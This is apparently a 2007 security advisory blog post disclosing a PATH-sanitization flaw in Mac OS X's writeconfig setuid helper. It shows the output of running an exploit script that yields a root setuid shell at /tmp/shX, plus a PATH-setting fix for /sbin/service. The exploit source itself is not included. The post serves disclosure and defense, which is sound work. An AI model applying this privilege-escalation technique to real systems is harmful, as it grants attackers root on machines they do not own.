Sunday, 21 January 2007

Apple System Preferences writeconfig Local Privilege Escalation Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 21-01-07
Description:: The preference panes setuid helper, writeconfig, makes use of a shell script which lacks of PATH sanitization, allowing users to execute arbitrary binaries under root privileges.
Apple provides the following description in the The Preference Application documentation::
System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse, and Display panes), software integrated into the system (such as the Dock and Screen Saver panes), and behavior applicable to every application (such as the International and General panes). When application preferences apply to the system or to the user's environment as a whole, a developer can make the preference pane available to System Preferences.
Several of the default preference panes rely on a setuid helper, writeconfig.
Exploit:: The provided (simplistic) exploit will create a root setuid shell wrapper at /tmp/shX. It relies on minimal interaction by the user, read the 'Exploitation conditions' section as this is just one of the possible methods to abuse the issue.
$ ruby MOAB-21-01-2007.rb
++ Click on Sharing and then click on Windows Sharing...
sh-2.05b# id
uid=501(lmh) gid=501(lmh) euid=0(root) groups=501(lmh), 81(appserveradm),
79(appserverusr), 80(admin)
sh-2.05b# ls -al /private/tmp/
total 72
-rwxr-xr-x 1 lmh wheel 13344 Jan 21 19:29 launchctl
-rwsr-xr-x 1 root wheel 13344 Jan 21 19:29 shX
-rw-r--r-- 1 lmh wheel 78 Jan 21 19:29 t.c
sh-2.05b# exit
Modify /sbin/service::
$ head /sbin/service

set -e
export PATH="/bin:/sbin:/usr/sbin:/usr/bin"

# don't let people kill us. We shouldn't be long, so this isn't a big deal.

trap "" TSTP
trap "" HUP

trap "" INT
Exploit:: MOAB-21-01-2007.rb

No comments: